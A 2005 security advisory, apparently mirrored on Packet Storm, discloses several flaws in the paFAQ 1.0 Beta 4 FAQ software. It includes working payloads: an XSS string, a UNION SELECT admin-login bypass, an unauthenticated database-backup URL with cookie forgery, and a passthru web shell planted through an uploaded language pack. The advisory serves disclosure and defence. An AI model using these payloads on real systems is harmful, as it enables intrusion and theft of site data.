what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

paFaq10beta4.txt

paFaq10beta4.txt
Posted Jun 21, 2005
Authored by James Bercegay | Site gulftech.org

paFaq version 1.0 Beta 4 suffers from SQL injection and remote command execution vulnerabilities.

tags | exploit, remote, vulnerability, sql injection
SHA-256 | 857e5523c32704ae5bef2804a3ddd90ad4b5070e6bc0a0ccbcfafb8a75be050f

paFaq10beta4.txt

Change Mirror Download
##########################################################
# GulfTech Security Research June 20th, 2005
##########################################################
# Vendor : php Arena
# URL : http://www.phparena.net/pafaq.php
# Version : paFAQ 1.0 Beta 4
# Risk : Multiple Vulnerabilities
##########################################################



Description:
paFAQ is a FAQ/Knowledge base system that allows webmasters to
keep an organized database of Frequently Asked Questions; a
Knowledge Database for problems and solutions. There are a number
of vulnerabilities in paFaq. These vulnerabilities include
arbitrary unauthorized access to the entire paFaq database, as
well as admin authentication bypass, sql injection, arbitrary
code execution and cross site scripting. An attacker can gain a
remote shell on a vulnerable system using these vulnerabilities.



Cross Site Scripting:
There are some cross site scripting issues in the paFaq software.
Majority of these cross site scripting issues stem from inputted
variables never being sanitized properly.

http:///pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28
document.cookie%29%3C%2Fscript%3E

These vulnerabilities can be used to render hostile code in the
context of the victims browser, and in turn disclose sensitive
information to an attacker.



SQL Injection:
There are a number of SQL Injection vulnerabilities in paFaq,
but it should be noted that to exploit these issues magic quotes
gpc must be off. Also, magic quotes off seems to be the default
php.ini settings now so I do consider these issues fairly high
risk. The most serious of the SQL Injection issues lies in the
administrative login.

$username = $_REQUEST['username'];
$password = md5($_REQUEST['password']);

$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE
name = '" . $username . "'");
$r = $DB->fetch_row($q);

if ($r['password'] == $password) {

$t = time();
$DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET
session='$t' WHERE id='".$r['id']."'");
setcookie("pafaq_user", $username, time()+3600);
setcookie("pafaq_pass", $password, time()+3600);

The variable $username is taken directly from the submitted login form
and executed in the query, so if magic quotes gpc is off an attacker can
use UNION SELECT to bypass admin authentication!

http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name,
'3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20
pafaq_admins%20WHERE%201/*&password=foobar

The query above uses a UNION SELECT to get the admin username, id, email etc
but we specify the password hash as the md5 encrypted value of the $password
variable. If the host is vulnerable then the above link will log an attacker
in as the first admin in the selected table. Additionally the "id" parameter
in most of the scripts are vulnerable to SQL Injection, and can be
exploited
when magic quotes gpc is set to off.



Arbitrary Database Download:
A very dangerous vulnerability lies in paFaq that will allow for an attacker
to download the entire paFaq database. A user does not have to be logged in
to exploit this vulnerability either, thus making it that more dangerous.

http://path/to/pafaq/admin/backup.php

An attacker can then use the encrypted password hash to gain administrative
access, there is no need for an attacker to decrypt it.

Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASH

By adding the above cookie with the required values taken from the
downloaded
database an attacker now has admin access to the affected paFaq
installation.



Arbitrary Code Execution:
Once an attacker has administrative access to the website he can execute any
arbitrary php code by taking advantage of the upload a language pack
feature.
The script does check for a "valid" language pack, but if an attacker, for
example, takes the default en.php file in the language directory and adds a
simple passthru($_GET['cmd']) at the bottom of the page, and then
uploads the
modified en.php after renaming it to something like pafaq.php as a new
language
pack, will be able to execute shell commands on the affected webserver
by calling
the malicious script in the /lang/ directory. Example
/lang/pafaq.php?cmd=id;pwd



Solution:
The developers were contacted and never responded. A quick workaround
would be
to delete the backup.php script, and turn magic quotes gpc on, or better
yet
use a more secure application if deployed live on the web.



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00083-06202005



Credits:
James Bercegay of the GulfTech Security Research Team
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close